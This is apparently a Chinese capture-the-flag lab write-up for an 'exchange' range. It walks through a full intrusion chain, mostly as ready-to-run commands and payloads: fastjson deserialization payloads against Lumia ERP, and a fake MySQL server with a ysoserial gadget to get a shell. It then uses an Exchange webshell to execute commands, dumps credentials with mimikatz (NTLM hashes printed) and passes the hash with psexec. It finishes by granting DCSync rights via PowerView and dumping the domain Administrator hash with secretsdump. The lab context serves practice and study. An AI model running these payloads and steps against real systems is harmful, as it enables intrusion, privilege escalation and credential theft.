0%

exchange_wp

exchange

感谢提供环境的hxd🥰

春秋云境的靶确实强

flag01

开局扫IP,开了22,80,8000

80是个php的站,没找到啥东西

8000是Java的lumia erp,找了一些功能点发现都是json传的

发现lumia erp有个awd出过,点是fastjson 1.2.68反序列化,找个地方验证一下,需要全字符URL编码

1
{"@type":"java.net.Inet4Address","val":"ebhd3z.dnslog.cn"}

验证fastjson版本:

1
2
3
4
5
6
7
8
9
10
11
12
13
[
{
"@type": "java.lang.AutoCloseable",
"@type": "java.io.ByteArrayOutputStream"
}, {
"@type": "java.io.ByteArrayOutputStream"
}, {
"@type": "java.net.InetSocketAddress" {
"address": ,
"val": "ebhd3z.dnslog.cn"
}
}
]

服务器起一个fake mysql server,需要ysoserial的jar文件

config.json改一下jar地址以及加一条用cc6弹shell的命令

起服务后服务端发包即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
{
"name": {
"@type": "java.lang.AutoCloseable",
"@type": "com.mysql.jdbc.JDBC4Connection",
"hostToConnectTo": "1.1.1.1",
"portToConnectTo": 3306,
"info": {
"user": "CommonsCollections6",
"password": "pas",
"detectCustomCollations": "true",
"autoDeserialize": "true",
"NUM_HOSTS": "1"
},
"databaseToConnectTo": "dbname",
"url": ""
}
}

flag01:

flag02

传一个fscan扫内网

2和9都是windows的机器,入口是12,26是个个人pc,用frp代理socks5出来,Kali上配一下proxychains即可

1
2
3
4
[socks5]
type = tcp
remote_port = 8081
plugin = socks5

9有一个outlook,找到一个利用工具可以任意命令执行

添加一个账户操作

1
2
net user sha999 pass@123 /add
net localgroup administrators sha999 /add

密码需要字母数字特殊字符,不然的话会创建失败

remmina登录,拿到flag02

flag04

mimikatz抓一下hash

1
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > 1.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
Authentication Id : 0 ; 100176 (00000000:00018750)
Session : Service from 0
User Name : Zhangtong
Domain : XIAORANG
Logon Server : XIAORANG-WIN16
Logon Time : 2023/8/5 13:31:52
SID : S-1-5-21-533686307-2117412543-4200729784-1147
msv :
[00000003] Primary
* Username : Zhangtong
* Domain : XIAORANG
* NTLM : 22c7f81993e96ac83ac2f3f1903de8b4
* SHA1 : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
* DPAPI : ed14c3c4ef895b1d11b04fb4e56bb83b
tspkg :
wdigest :
* Username : Zhangtong
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : Zhangtong
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 10102536 (00000000:009a2708)
Session : Interactive from 4
User Name : DWM-4
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/8/5 13:53:06
SID : S-1-5-90-0-4
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : b2fdb13f284a5249f3657fb155b9ed01
* SHA1 : b400c19ab343b632d23937cea02cf731088f9fd2
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XIAORANG-EXC01$
* Domain : xiaorang.lab

一个域用户zhangtong和system用户

然后用bloodhound分析一下域环境,刚加的用户没有域权限,需要用exchange的exp打的那个shell执行

1
proxychains curl --request POST --url https://172.22.3.9/owa/auth/k7su8.aspx --header 'Content-Type: application/x-www-form-urlencoded' --data 'request=Response.Write(new ActiveXObject("WScript.Shell").exec("C:/Users/sha999/Desktop/SharpHound.exe -c all --OutputDirectory C:/Users/sha999/Desktop").stdout.readall())' -k

把生成的zip导到本地分析,参考渗透测试之内网攻防篇:使用 BloodHound 分析大型域内环境 - FreeBuf网络安全行业门户

可以看到exchange机器是有writedacl权限的,可以利用WriteDacl权限添加Zhangtong的DCSync权限

使用psexec连接system用户添加权限

1
proxychains impacket-psexec -hashes :b2fdb13f284a5249f3657fb155b9ed01 XIAORANG/XIAORANG-EXC01\$@172.22.3.9

1
powershell -command "cd C:/Users/sha999/Desktop/; Import-Module .\powerview.ps1; Add-DomainObjectAcl -TargetIdentity 'DC=xiaorang,DC=lab' -PrincipalIde Zhangtong -Rights DCSync -Verbose"

PowerView.ps1

secretsdump导一下域的hash

1
proxychains impacket-secretsdump xiaorang.lab/Zhangtong@172.22.3.2 -hashes :22c7f81993e96ac83ac2f3f1903de8b4 -just-dc

1
xiaorang.lab\Administrator:500:aad3b435b51404eeaad3b435b51404ee:7acbc09a6c0efd81bfa7d5a1d4238beb:::

同样创建用户登录

flag03

域控改一下26pc的密码,登进去看看

桌面上有个压缩包需要密码

在exchange里面使用lumia的密码登录可以看到两个邮件,密码是csv里的某个电话

拖出来直接爆破